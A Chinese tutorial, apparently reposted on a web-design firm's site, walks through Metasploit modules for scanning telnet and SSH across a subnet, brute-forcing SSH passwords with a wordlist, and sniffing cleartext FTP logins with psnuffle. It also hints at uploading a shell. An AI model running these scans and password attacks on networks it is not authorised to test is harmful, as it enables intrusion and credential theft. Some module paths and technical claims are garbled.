Metasploit学习三常见的服务扫描与口令猜解-成都快上网建站

Metasploit学习三常见的服务扫描与口令猜解

有的时候我们利用了Nmap发现了端口和服务器上的服务器,然而我们并不是专业的hack,很多时候或许我们只能破FTP 共享和telnet,虽然够低端,但是如果你已经在一个局域网中了,上面3个服务器必然会存在。

创新互联长期为上千客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为依兰企业提供专业的网站制作、成都网站设计,依兰网站改版等技术服务。拥有10余年丰富建站经验和众多成功案例,为您定制开发。

利用telnet来扫描

>search telnet_version  查找telnet扫描模块

>use auxiliary/scanner/telnet/telnet_version  使用该模块

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用ssh来扫描

>search ssh_version  查找ssh扫描模块

>use auxiliary/scanner/telnet/ssh_version  这个版本可能是其他的

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用services来进行扫描的方法都是大同小异,如果想利用其他的services进行扫描,可以先

>search name_version 扫描出具体支持哪些服务,当然这是个积累的过程,常用的扫描还有oracle Mssql MySQL等等,当然其实很多时候我们都是在抓瞎,Nmap足以解决问题了,更多的时候我们使用这个工具就是为了后面的猜解和监听做准备,下面就讲解一些猜解方法。

SSH服务口令猜解

SSH服务器相当于windows下的FTP,我想多数管理员是不会配置密码的,因为SSH可以通过公钥配对加密和验证的,而且很难猜解,当然也许有的管理员就设置了账户密码,这样的时候我们就可以利用下面的命令进行猜解了,当然你得有一张足够大的彩虹表

>search ssh 如果熟练了可以直接敲路径了,反正我是记不住,而且模块众多,短时间很难掌握全。

>use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块

>set RHOSTS 192.168.1.105 设置hosts

>set USERNAME root    设置用户名为root

>set set PASS_FILE/root/password.txt 这个字典自己做啦,工具很多,好坏就在于字典了

>set THREADS 50 设置线程数,这个设置多了可能会死机,会拒绝服务,设置少了猜解会慢

>run

因为我不会拿自己的职业生涯开玩笑,所以我只在我自己搭建的环境下试验过,所以效果如何不敢评价,总是不太好吧。

FTP嗅探工具psnuffle

这个工具是嗅探明文传送的FTP的,所以所见即所得,内网破解很实用,尤其是在win系统下,如果是利用IIS搭建的FTP服务,那么你嗅探到的账户肯定具有user权限,而后怎么提权就自己想去吧,如果利用FTP软件,这个账户即使得到个人感觉用处也不大,除非可以获得写权限,这样可以上传shell.好吧,不多讲了,看下psnuffle这个绕口的工具的使用方法:

>use auxiliary/sniffer/psnuffle

>run

当然你如果确定了端口也可以进行一些限制,使用set命令就好,这个嗅探可能需要开那么几个小时,因为谁也不知道啥时候会有人登陆FTP,有的时候我在局域网了,我宁愿做DNS欺骗,感觉这样更加简单暴力,当然,也许直接就被防火墙抓了,呵呵


文章题目:Metasploit学习三常见的服务扫描与口令猜解
文章来源:http://kswjz.com/article/pjocis.html
扫二维码与项目经理沟通

我们在微信上24小时期待你的声音

解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流